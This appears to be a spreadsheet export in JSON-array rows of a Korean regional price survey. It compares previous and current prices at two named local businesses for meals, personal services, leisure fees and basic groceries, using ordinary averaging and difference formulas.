[7,"김치찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J42,\"<>0\")+COUNTIF(N42,\"<>0\")","v":2},{"$f":"COUNTIF(K42,\"<>0\")+COUNTIF(O42,\"<>0\")","v":2},{"$f":"IF(D42=0,0,SUM(J42,N42)/D42)","v":{"v":7750,"d":"7,750"}},{"$f":"IF(E42=0,0,SUM(K42,O42)/E42)","v":{"v":7750,"d":"7,750"}},{"$f":"G42-F42","v":0},"낙지뻘식당",9000,9000,{"$f":"K42-J42","v":0},"이파리",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},{"$f":"O42-N42","v":0}]
[8,"불고기","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J43,\"<>0\")+COUNTIF(N43,\"<>0\")","v":2},{"$f":"COUNTIF(K43,\"<>0\")+COUNTIF(O43,\"<>0\")","v":2},{"$f":"IF(D43=0,0,SUM(J43,N43)/D43)","v":{"v":29221.5,"d":"29,222"}},{"$f":"IF(E43=0,0,SUM(K43,O43)/E43)","v":{"v":30554.5,"d":"30,555"}},{"$f":"G43-F43","v":{"v":1333,"d":"1,333"}},"시내식당",27777,27777,{"$f":"K43-J43","v":0},"한라산식당",{"v":30666,"d":"30,666"},{"v":33332,"d":"33,332"},{"$f":"O43-N43","v":{"v":2666,"d":"2,666"}}]
[9,"등심구이","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J44,\"<>0\")+COUNTIF(N44,\"<>0\")","v":2},{"$f":"COUNTIF(K44,\"<>0\")+COUNTIF(O44,\"<>0\")","v":2},{"$f":"IF(D44=0,0,SUM(J44,N44)/D44)","v":{"v":41999.5,"d":"42,000"}},{"$f":"IF(E44=0,0,SUM(K44,O44)/E44)","v":{"v":41999.5,"d":"42,000"}},{"$f":"G44-F44","v":0},"화담정",33333,33333,{"$f":"K44-J44","v":0},"순한우촌",{"v":50666,"d":"50,666"},{"v":50666,"d":"50,666"},{"$f":"O44-N44","v":0}]
[10,"생선초밥","1인분(보통), 활어기준",{"$f":"COUNTIF(J45,\"<>0\")+COUNTIF(N45,\"<>0\")","v":1},{"$f":"COUNTIF(K45,\"<>0\")+COUNTIF(O45,\"<>0\")","v":1},{"$f":"IF(D45=0,0,SUM(J45,N45)/D45)","v":{"v":17000,"d":"17,000"}},{"$f":"IF(E45=0,0,SUM(K45,O45)/E45)","v":{"v":17000,"d":"17,000"}},{"$f":"G45-F45","v":0},"초밥이야기",{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},{"$f":"K45-J45","v":0},null,0,0,{"$f":"O45-N45","v":0}]
[11,"튀김닭","양념통닭 1마리",{"$f":"COUNTIF(J46,\"<>0\")+COUNTIF(N46,\"<>0\")","v":2},{"$f":"COUNTIF(K46,\"<>0\")+COUNTIF(O46,\"<>0\")","v":2},{"$f":"IF(D46=0,0,SUM(J46,N46)/D46)","v":{"v":18500,"d":"18,500"}},{"$f":"IF(E46=0,0,SUM(K46,O46)/E46)","v":{"v":18500,"d":"18,500"}},{"$f":"G46-F46","v":0},"처가집치킨",19000,19000,{"$f":"K46-J46","v":0},"굽네치킨",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},{"$f":"O46-N46","v":0}]
[12,"칼국수","1인분(보통)",{"$f":"COUNTIF(J47,\"<>0\")+COUNTIF(N47,\"<>0\")","v":2},{"$f":"COUNTIF(K47,\"<>0\")+COUNTIF(O47,\"<>0\")","v":2},{"$f":"IF(D47=0,0,SUM(J47,N47)/D47)","v":{"v":7500,"d":"7,500"}},{"$f":"IF(E47=0,0,SUM(K47,O47)/E47)","v":{"v":7500,"d":"7,500"}},{"$f":"G47-F47","v":0},"만나칼국수",8000,8000,{"$f":"K47-J47","v":0},"화영칼국수",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O47-N47","v":0}]
[13,"조리라면","분식점 1인분",{"$f":"COUNTIF(J48,\"<>0\")+COUNTIF(N48,\"<>0\")","v":2},{"$f":"COUNTIF(K48,\"<>0\")+COUNTIF(O48,\"<>0\")","v":2},{"$f":"IF(D48=0,0,SUM(J48,N48)/D48)","v":{"v":4250,"d":"4,250"}},{"$f":"IF(E48=0,0,SUM(K48,O48)/E48)","v":{"v":4250,"d":"4,250"}},{"$f":"G48-F48","v":0},"정가네김밥",4500,4500,{"$f":"K48-J48","v":0},"이파리",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"O48-N48","v":0}]
[14,"김밥","분식점 1인분",{"$f":"COUNTIF(J49,\"<>0\")+COUNTIF(N49,\"<>0\")","v":2},{"$f":"COUNTIF(K49,\"<>0\")+COUNTIF(O49,\"<>0\")","v":2},{"$f":"IF(D49=0,0,SUM(J49,N49)/D49)","v":{"v":3000,"d":"3,000"}},{"$f":"IF(E49=0,0,SUM(K49,O49)/E49)","v":{"v":3000,"d":"3,000"}},{"$f":"G49-F49","v":0},"정가네김밥",3500,3500,{"$f":"K49-J49","v":0},"이파리",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},{"$f":"O49-N49","v":0}]
[15,"짜장면","1인분(보통)",{"$f":"COUNTIF(J50,\"<>0\")+COUNTIF(N50,\"<>0\")","v":2},{"$f":"COUNTIF(K50,\"<>0\")+COUNTIF(O50,\"<>0\")","v":2},{"$f":"IF(D50=0,0,SUM(J50,N50)/D50)","v":{"v":6000,"d":"6,000"}},{"$f":"IF(E50=0,0,SUM(K50,O50)/E50)","v":{"v":6000,"d":"6,000"}},{"$f":"G50-F50","v":0},"연경",6000,6000,{"$f":"K50-J50","v":0},"청해루",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"O50-N50","v":0}]
[16,"짬뽕","1인분(보통)",{"$f":"COUNTIF(J51,\"<>0\")+COUNTIF(N51,\"<>0\")","v":2},{"$f":"COUNTIF(K51,\"<>0\")+COUNTIF(O51,\"<>0\")","v":2},{"$f":"IF(D51=0,0,SUM(J51,N51)/D51)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E51=0,0,SUM(K51,O51)/E51)","v":{"v":8000,"d":"8,000"}},{"$f":"G51-F51","v":0},"연경",8000,8000,{"$f":"K51-J51","v":0},"청해루",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},{"$f":"O51-N51","v":0}]
[17,"탕수육","일반탕수육(보통)",{"$f":"COUNTIF(J52,\"<>0\")+COUNTIF(N52,\"<>0\")","v":2},{"$f":"COUNTIF(K52,\"<>0\")+COUNTIF(O52,\"<>0\")","v":2},{"$f":"IF(D52=0,0,SUM(J52,N52)/D52)","v":{"v":21000,"d":"21,000"}},{"$f":"IF(E52=0,0,SUM(K52,O52)/E52)","v":{"v":21000,"d":"21,000"}},{"$f":"G52-F52","v":0},"연경",22000,22000,{"$f":"K52-J52","v":0},"청해루",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},{"$f":"O52-N52","v":0}]
[18,"돈가스","일반돈가스,1인분",{"$f":"COUNTIF(J53,\"<>0\")+COUNTIF(N53,\"<>0\")","v":2},{"$f":"COUNTIF(K53,\"<>0\")+COUNTIF(O53,\"<>0\")","v":2},{"$f":"IF(D53=0,0,SUM(J53,N53)/D53)","v":{"v":9000,"d":"9,000"}},{"$f":"IF(E53=0,0,SUM(K53,O53)/E53)","v":{"v":9000,"d":"9,000"}},{"$f":"G53-F53","v":0},"행복돈가스",9000,9000,{"$f":"K53-J53","v":0},"마로정",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O53-N53","v":0}]
[19,"햄버거","기본형(야채,고기)",{"$f":"COUNTIF(J54,\"<>0\")+COUNTIF(N54,\"<>0\")","v":2},{"$f":"COUNTIF(K54,\"<>0\")+COUNTIF(O54,\"<>0\")","v":2},{"$f":"IF(D54=0,0,SUM(J54,N54)/D54)","v":{"v":3550,"d":"3,550"}},{"$f":"IF(E54=0,0,SUM(K54,O54)/E54)","v":{"v":3550,"d":"3,550"}},{"$f":"G54-F54","v":0},"맘스터치",3900,3900,{"$f":"K54-J54","v":0},"트라이얼코리아",{"v":3200,"d":"3,200"},{"v":3200,"d":"3,200"},{"$f":"O54-N54","v":0}]
[20,"피자","기본형(야채,고기)",{"$f":"COUNTIF(J55,\"<>0\")+COUNTIF(N55,\"<>0\")","v":2},{"$f":"COUNTIF(K55,\"<>0\")+COUNTIF(O55,\"<>0\")","v":2},{"$f":"IF(D55=0,0,SUM(J55,N55)/D55)","v":{"v":18400,"d":"18,400"}},{"$f":"IF(E55=0,0,SUM(K55,O55)/E55)","v":{"v":18400,"d":"18,400"}},{"$f":"G55-F55","v":0},"청년피자",18900,18900,{"$f":"K55-J55","v":0},"피자가 기가막혀",{"v":17900,"d":"17,900"},{"v":17900,"d":"17,900"},{"$f":"O55-N55","v":0}]
[21,"커피(외식)","일반원두커피",{"$f":"COUNTIF(J56,\"<>0\")+COUNTIF(N56,\"<>0\")","v":2},{"$f":"COUNTIF(K56,\"<>0\")+COUNTIF(O56,\"<>0\")","v":2},{"$f":"IF(D56=0,0,SUM(J56,N56)/D56)","v":{"v":3000,"d":"3,000"}},{"$f":"IF(E56=0,0,SUM(K56,O56)/E56)","v":{"v":3000,"d":"3,000"}},{"$f":"G56-F56","v":0},"토프레소(창덕)",3000,3000,{"$f":"K56-J56","v":0},"요거프레소",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},{"$f":"O56-N56","v":0}]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",{"$f":"COUNTIF(J57,\"<>0\")+COUNTIF(N57,\"<>0\")","v":2},{"$f":"COUNTIF(K57,\"<>0\")+COUNTIF(O57,\"<>0\")","v":2},{"$f":"IF(D57=0,0,SUM(J57,N57)/D57)","v":{"v":3900,"d":"3,900"}},{"$f":"IF(E57=0,0,SUM(K57,O57)/E57)","v":{"v":3900,"d":"3,900"}},{"$f":"G57-F57","v":0},"토프레소(창덕)",4000,4000,{"$f":"K57-J57","v":0},"요거프레소",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},{"$f":"O57-N57","v":0}]
[23,"삼겹살","식육식당 200g(국내산)",{"$f":"COUNTIF(J58,\"<>0\")+COUNTIF(N58,\"<>0\")","v":2},{"$f":"COUNTIF(K58,\"<>0\")+COUNTIF(O58,\"<>0\")","v":2},{"$f":"IF(D58=0,0,SUM(J58,N58)/D58)","v":{"v":15250,"d":"15,250"}},{"$f":"IF(E58=0,0,SUM(K58,O58)/E58)","v":{"v":15250,"d":"15,250"}},{"$f":"G58-F58","v":0},"헌라산식당",15000,15000,{"$f":"K58-J58","v":0},"수림정",{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},{"$f":"O58-N58","v":0}]
[24,"돼지갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J59,\"<>0\")+COUNTIF(N59,\"<>0\")","v":2},{"$f":"COUNTIF(K59,\"<>0\")+COUNTIF(O59,\"<>0\")","v":2},{"$f":"IF(D59=0,0,SUM(J59,N59)/D59)","v":{"v":14500,"d":"14,500"}},{"$f":"IF(E59=0,0,SUM(K59,O59)/E59)","v":{"v":14500,"d":"14,500"}},{"$f":"G59-F59","v":0},"한라산식당",15000,15000,{"$f":"K59-J59","v":0},"수림정",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},{"$f":"O59-N59","v":0}]
[25,"쇠갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J60,\"<>0\")+COUNTIF(N60,\"<>0\")","v":0},{"$f":"COUNTIF(K60,\"<>0\")+COUNTIF(O60,\"<>0\")","v":0},{"$f":"IF(D60=0,0,SUM(J60,N60)/D60)","v":0},{"$f":"IF(E60=0,0,SUM(K60,O60)/E60)","v":0},{"$f":"G60-F60","v":0},"매실한우",0,0,{"$f":"K60-J60","v":0},"삼대불고기",0,0,{"$f":"O60-N60","v":0}]
[26,"생맥주","500CC 1잔",{"$f":"COUNTIF(J61,\"<>0\")+COUNTIF(N61,\"<>0\")","v":2},{"$f":"COUNTIF(K61,\"<>0\")+COUNTIF(O61,\"<>0\")","v":2},{"$f":"IF(D61=0,0,SUM(J61,N61)/D61)","v":{"v":4000,"d":"4,000"}},{"$f":"IF(E61=0,0,SUM(K61,O61)/E61)","v":{"v":4000,"d":"4,000"}},{"$f":"G61-F61","v":0},"투모아",4000,4000,{"$f":"K61-J61","v":0},"꼬치이야기",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"O61-N61","v":0}]
[27,"공동\n주택관리비","주공 17평1개월\n(공과금 제외)",{"$f":"COUNTIF(J62,\"<>0\")+COUNTIF(N62,\"<>0\")","v":1},{"$f":"COUNTIF(K62,\"<>0\")+COUNTIF(O62,\"<>0\")","v":1},{"$f":"IF(D62=0,0,SUM(J62,N62)/D62)","v":{"v":52000,"d":"52,000"}},{"$f":"IF(E62=0,0,SUM(K62,O62)/E62)","v":{"v":36000,"d":"36,000"}},{"$f":"G62-F62","v":{"v":-16000,"d":"-16,000"}},"목성아파트",52000,36000,{"$f":"K62-J62","v":{"v":-16000,"d":"-16,000"}},null,0,0,{"$f":"O62-N62","v":0}]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",{"$f":"COUNTIF(J63,\"<>0\")+COUNTIF(N63,\"<>0\")","v":2},{"$f":"COUNTIF(K63,\"<>0\")+COUNTIF(O63,\"<>0\")","v":2},{"$f":"IF(D63=0,0,SUM(J63,N63)/D63)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E63=0,0,SUM(K63,O63)/E63)","v":{"v":8500,"d":"8,500"}},{"$f":"G63-F63","v":500},"서울세탁소",9000,10000,{"$f":"K63-J63","v":{"v":1000,"d":"1,000"}},"때빼때세탁소",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O63-N63","v":0}]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",{"$f":"COUNTIF(J64,\"<>0\")+COUNTIF(N64,\"<>0\")","v":2},{"$f":"COUNTIF(K64,\"<>0\")+COUNTIF(O64,\"<>0\")","v":2},{"$f":"IF(D64=0,0,SUM(J64,N64)/D64)","v":{"v":4500,"d":"4,500"}},{"$f":"IF(E64=0,0,SUM(K64,O64)/E64)","v":{"v":5000,"d":"5,000"}},{"$f":"G64-F64","v":500},"서울세탁소",4000,5000,{"$f":"K64-J64","v":{"v":1000,"d":"1,000"}},"때빼때세탁소",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},{"$f":"O64-N64","v":0}]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",{"$f":"COUNTIF(J65,\"<>0\")+COUNTIF(N65,\"<>0\")","v":1},{"$f":"COUNTIF(K65,\"<>0\")+COUNTIF(O65,\"<>0\")","v":1},{"$f":"IF(D65=0,0,SUM(J65,N65)/D65)","v":{"v":13000,"d":"13,000"}},{"$f":"IF(E65=0,0,SUM(K65,O65)/E65)","v":{"v":13000,"d":"13,000"}},{"$f":"G65-F65","v":0},null,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},{"$f":"K65-J65","v":0},null,0,0,{"$f":"O65-N65","v":0}]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",{"$f":"COUNTIF(J66,\"<>0\")+COUNTIF(N66,\"<>0\")","v":0},{"$f":"COUNTIF(K66,\"<>0\")+COUNTIF(O66,\"<>0\")","v":0},{"$f":"IF(D66=0,0,SUM(J66,N66)/D66)","v":0},{"$f":"IF(E66=0,0,SUM(K66,O66)/E66)","v":0},{"$f":"G66-F66","v":0},null,"0","0",{"$f":"K66-J66","v":0},null,0,0,{"$f":"O66-N66","v":0}]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",{"$f":"COUNTIF(J67,\"<>0\")+COUNTIF(N67,\"<>0\")","v":1},{"$f":"COUNTIF(K67,\"<>0\")+COUNTIF(O67,\"<>0\")","v":1},{"$f":"IF(D67=0,0,SUM(J67,N67)/D67)","v":{"v":3500,"d":"3,500"}},{"$f":"IF(E67=0,0,SUM(K67,O67)/E67)","v":{"v":3500,"d":"3,500"}},{"$f":"G67-F67","v":0},"광양수영장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},{"$f":"K67-J67","v":0},null,0,0,{"$f":"O67-N67","v":0}]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",{"$f":"COUNTIF(J68,\"<>0\")+COUNTIF(N68,\"<>0\")","v":1},{"$f":"COUNTIF(K68,\"<>0\")+COUNTIF(O68,\"<>0\")","v":1},{"$f":"IF(D68=0,0,SUM(J68,N68)/D68)","v":{"v":4000,"d":"4,000"}},{"$f":"IF(E68=0,0,SUM(K68,O68)/E68)","v":{"v":4000,"d":"4,000"}},{"$f":"G68-F68","v":0},"월드볼링장",4000,4000,{"$f":"K68-J68","v":0},null,0,0,{"$f":"O68-N68","v":0}]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",{"$f":"COUNTIF(J69,\"<>0\")+COUNTIF(N69,\"<>0\")","v":1},{"$f":"COUNTIF(K69,\"<>0\")+COUNTIF(O69,\"<>0\")","v":1},{"$f":"IF(D69=0,0,SUM(J69,N69)/D69)","v":{"v":100000,"d":"100,000"}},{"$f":"IF(E69=0,0,SUM(K69,O69)/E69)","v":{"v":100000,"d":"100,000"}},{"$f":"G69-F69","v":0},"창성골프연습장",100000,100000,{"$f":"K69-J69","v":0},null,0,0,{"$f":"O69-N69","v":0}]
[35,"노래방\n이용료","일반인 저녁 1시간",{"$f":"COUNTIF(J70,\"<>0\")+COUNTIF(N70,\"<>0\")","v":2},{"$f":"COUNTIF(K70,\"<>0\")+COUNTIF(O70,\"<>0\")","v":2},{"$f":"IF(D70=0,0,SUM(J70,N70)/D70)","v":{"v":25000,"d":"25,000"}},{"$f":"IF(E70=0,0,SUM(K70,O70)/E70)","v":{"v":25000,"d":"25,000"}},{"$f":"G70-F70","v":0},"매화노래방",25000,25000,{"$f":"K70-J70","v":0},"고래고래노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},{"$f":"O70-N70","v":0}]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",{"$f":"COUNTIF(J71,\"<>0\")+COUNTIF(N71,\"<>0\")","v":2},{"$f":"COUNTIF(K71,\"<>0\")+COUNTIF(O71,\"<>0\")","v":2},{"$f":"IF(D71=0,0,SUM(J71,N71)/D71)","v":{"v":9000,"d":"9,000"}},{"$f":"IF(E71=0,0,SUM(K71,O71)/E71)","v":{"v":9000,"d":"9,000"}},{"$f":"G71-F71","v":0},"퀸당구장",9000,9000,{"$f":"K71-J71","v":0},"굿당당구장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O71-N71","v":0}]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",{"$f":"COUNTIF(J72,\"<>0\")+COUNTIF(N72,\"<>0\")","v":2},{"$f":"COUNTIF(K72,\"<>0\")+COUNTIF(O72,\"<>0\")","v":2},{"$f":"IF(D72=0,0,SUM(J72,N72)/D72)","v":{"v":22500,"d":"22,500"}},{"$f":"IF(E72=0,0,SUM(K72,O72)/E72)","v":{"v":22500,"d":"22,500"}},{"$f":"G72-F72","v":0},"니콘사진관",20000,20000,{"$f":"K72-J72","v":0},"신가스튜디오",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},{"$f":"O72-N72","v":0}]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",{"$f":"COUNTIF(J73,\"<>0\")+COUNTIF(N73,\"<>0\")","v":2},{"$f":"COUNTIF(K73,\"<>0\")+COUNTIF(O73,\"<>0\")","v":2},{"$f":"IF(D73=0,0,SUM(J73,N73)/D73)","v":400},{"$f":"IF(E73=0,0,SUM(K73,O73)/E73)","v":400},{"$f":"G73-F73","v":0},"니콘사진관",300,300,{"$f":"K73-J73","v":0},"신가스튜디오",500,500,{"$f":"O73-N73","v":0}]
[39,"영상매체대여료","최신판 영화 DVD대여요금",{"$f":"COUNTIF(J74,\"<>0\")+COUNTIF(N74,\"<>0\")","v":0},{"$f":"COUNTIF(K74,\"<>0\")+COUNTIF(O74,\"<>0\")","v":0},{"$f":"IF(D74=0,0,SUM(J74,N74)/D74)","v":0},{"$f":"IF(E74=0,0,SUM(K74,O74)/E74)","v":0},{"$f":"G74-F74","v":0},null,"0","0",{"$f":"K74-J74","v":0},null,"0","0",{"$f":"O74-N74","v":0}]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},{"$f":"COUNTIF(K75,\"<>0\")+COUNTIF(O75,\"<>0\")","v":2},{"$f":"IF(D75=0,0,SUM(J75,N75)/D75)","v":{"v":15000,"d":"15,000"}},{"$f":"IF(E75=0,0,SUM(K75,O75)/E75)","v":{"v":15000,"d":"15,000"}},{"$f":"G75-F75","v":0},"광양이용원",15000,15000,{"$f":"K75-J75","v":0},"늘푸른이용원",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"O75-N75","v":0}]
[41,"미용료","성인여자 파마(일반)",{"$f":"COUNTIF(J76,\"<>0\")+COUNTIF(N76,\"<>0\")","v":2},{"$f":"COUNTIF(K76,\"<>0\")+COUNTIF(O76,\"<>0\")","v":2},{"$f":"IF(D76=0,0,SUM(J76,N76)/D76)","v":{"v":45000,"d":"45,000"}},{"$f":"IF(E76=0,0,SUM(K76,O76)/E76)","v":{"v":45000,"d":"45,000"}},{"$f":"G76-F76","v":0},"리헤어피카소",50000,50000,{"$f":"K76-J76","v":0},"지샾미용실",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"O76-N76","v":0}]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J77,\"<>0\")+COUNTIF(N77,\"<>0\")","v":2},{"$f":"COUNTIF(K77,\"<>0\")+COUNTIF(O77,\"<>0\")","v":2},{"$f":"IF(D77=0,0,SUM(J77,N77)/D77)","v":{"v":7000,"d":"7,000"}},{"$f":"IF(E77=0,0,SUM(K77,O77)/E77)","v":{"v":7000,"d":"7,000"}},{"$f":"G77-F77","v":0},"삼보천",7000,7000,{"$f":"K77-J77","v":0},"밭샘사우나",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O77-N77","v":0}]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",{"$f":"COUNTIF(J78,\"<>0\")+COUNTIF(N78,\"<>0\")","v":0},{"$f":"COUNTIF(K78,\"<>0\")+COUNTIF(O78,\"<>0\")","v":0},{"$f":"IF(D78=0,0,SUM(J78,N78)/D78)","v":0},{"$f":"IF(E78=0,0,SUM(K78,O78)/E78)","v":0},{"$f":"G78-F78","v":0},null,0,0,{"$f":"K78-J78","v":0},null,0,0,{"$f":"O78-N78","v":0}]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",{"$f":"COUNTIF(J79,\"<>0\")+COUNTIF(N79,\"<>0\")","v":2},{"$f":"COUNTIF(K79,\"<>0\")+COUNTIF(O79,\"<>0\")","v":2},{"$f":"IF(D79=0,0,SUM(J79,N79)/D79)","v":{"v":37500,"d":"37,500"}},{"$f":"IF(E79=0,0,SUM(K79,O79)/E79)","v":{"v":37500,"d":"37,500"}},{"$f":"G79-F79","v":0},"대산모텔",35000,35000,{"$f":"K79-J79","v":0},"타워모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"O79-N79","v":0}]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",{"$f":"COUNTIF(J80,\"<>0\")+COUNTIF(N80,\"<>0\")","v":0},{"$f":"COUNTIF(K80,\"<>0\")+COUNTIF(O80,\"<>0\")","v":0},{"$f":"IF(D80=0,0,SUM(J80,N80)/D80)","v":0},{"$f":"IF(E80=0,0,SUM(K80,O80)/E80)","v":0},{"$f":"G80-F80","v":0},null,"0","0",{"$f":"K80-J80","v":0},null,"0","0",{"$f":"O80-N80","v":0}]
[46,"PC방\n이용료","1회 이용시",{"$f":"COUNTIF(J81,\"<>0\")+COUNTIF(N81,\"<>0\")","v":2},{"$f":"COUNTIF(K81,\"<>0\")+COUNTIF(O81,\"<>0\")","v":2},{"$f":"IF(D81=0,0,SUM(J81,N81)/D81)","v":{"v":1350,"d":"1,350"}},{"$f":"IF(E81=0,0,SUM(K81,O81)/E81)","v":{"v":1500,"d":"1,500"}},{"$f":"G81-F81","v":150},"미스터케이PC",1200,1500,{"$f":"K81-J81","v":300},"아이센스PC방",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},{"$f":"O81-N81","v":0}]
[47,"택배이용료","20kg이하, 타지역",{"$f":"COUNTIF(J82,\"<>0\")+COUNTIF(N82,\"<>0\")","v":2},{"$f":"COUNTIF(K82,\"<>0\")+COUNTIF(O82,\"<>0\")","v":2},{"$f":"IF(D82=0,0,SUM(J82,N82)/D82)","v":{"v":7000,"d":"7,000"}},{"$f":"IF(E82=0,0,SUM(K82,O82)/E82)","v":{"v":7000,"d":"7,000"}},{"$f":"G82-F82","v":0},"건영택배",7000,7000,{"$f":"K82-J82","v":0},"현대택배",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O82-N82","v":0}]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J83,\"<>0\")+COUNTIF(N83,\"<>0\")","v":0},{"$f":"COUNTIF(K83,\"<>0\")+COUNTIF(O83,\"<>0\")","v":0},{"$f":"IF(D83=0,0,SUM(J83,N83)/D83)","v":0},{"$f":"IF(E83=0,0,SUM(K83,O83)/E83)","v":0},{"$f":"G83-F83","v":0},null,"0","0",{"$f":"K83-J83","v":0},null,"0","0",{"$f":"O83-N83","v":0}]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",{"$f":"COUNTIF(J84,\"<>0\")+COUNTIF(N84,\"<>0\")","v":0},{"$f":"COUNTIF(K84,\"<>0\")+COUNTIF(O84,\"<>0\")","v":0},{"$f":"IF(D84=0,0,SUM(J84,N84)/D84)","v":0},{"$f":"IF(E84=0,0,SUM(K84,O84)/E84)","v":0},{"$f":"G84-F84","v":0},null,"0","0",{"$f":"K84-J84","v":0},null,"0","0",{"$f":"O84-N84","v":0}]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(O86,\"<>0\")","v":2},{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":5470,"d":"5,470"}},{"$f":"IF(E86=0,0,SUM(K86,O86)/E86)","v":{"v":5470,"d":"5,470"}},{"$f":"G86-F86","v":0},"농협하나로마트",5350,5350,{"$f":"K86-J86","v":0},"트라이얼코리아",{"v":5590,"d":"5,590"},{"v":5590,"d":"5,590"},{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(N87,\"<>0\")","v":2},{"$f":"COUNTIF(K87,\"<>0\")+COUNTIF(O87,\"<>0\")","v":2},{"$f":"IF(D87=0,0,SUM(J87,N87)/D87)","v":{"v":1350,"d":"1,350"}},{"$f":"IF(E87=0,0,SUM(K87,O87)/E87)","v":{"v":1350,"d":"1,350"}},{"$f":"G87-F87","v":0},"농협하나로마트",1250,1250,{"$f":"K87-J87","v":0},"트라이얼코리아",{"v":1450,"d":"1,450"},{"v":1450,"d":"1,450"},{"$f":"O87-N87","v":0}]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",{"$f":"COUNTIF(J88,\"<>0\")+COUNTIF(N88,\"<>0\")","v":2},{"$f":"COUNTIF(K88,\"<>0\")+COUNTIF(O88,\"<>0\")","v":2},{"$f":"IF(D88=0,0,SUM(J88,N88)/D88)","v":{"v":1135,"d":"1,135"}},{"$f":"IF(E88=0,0,SUM(K88,O88)/E88)","v":{"v":1135,"d":"1,135"}},{"$f":"G88-F88","v":0},"농협하나로마트",1080,1080,{"$f":"K88-J88","v":0},"트라이얼코리아",{"v":1190,"d":"1,190"},{"v":1190,"d":"1,190"},{"$f":"O88-N88","v":0}]
[4,"식용유","콩기름 1.8ml",{"$f":"COUNTIF(J89,\"<>0\")+COUNTIF(N89,\"<>0\")","v":2},{"$f":"COUNTIF(K89,\"<>0\")+COUNTIF(O89,\"<>0\")","v":2},{"$f":"IF(D89=0,0,SUM(J89,N89)/D89)","v":{"v":6985,"d":"6,985"}},{"$f":"IF(E89=0,0,SUM(K89,O89)/E89)","v":{"v":6985,"d":"6,985"}},{"$f":"G89-F89","v":0},"농협하나로마트",6980,6980,{"$f":"K89-J89","v":0},"트라이얼코리아",{"v":6990,"d":"6,990"},{"v":6990,"d":"6,990"},{"$f":"O89-N89","v":0}]
[5,"설탕","정백당 1kg",{"$f":"COUNTIF(J90,\"<>0\")+COUNTIF(N90,\"<>0\")","v":2},{"$f":"COUNTIF(K90,\"<>0\")+COUNTIF(O90,\"<>0\")","v":2},{"$f":"IF(D90=0,0,SUM(J90,N90)/D90)","v":{"v":2935,"d":"2,935"}},{"v":2935,"d":"2,935"},{"$f":"G90-F90","v":0},"농협하나로마트",2380,2380,{"$f":"K90-J90","v":0},"트라이얼코리아",{"v":3490,"d":"3,490"},{"v":3490,"d":"3,490"},{"$f":"O90-N90","v":0}]
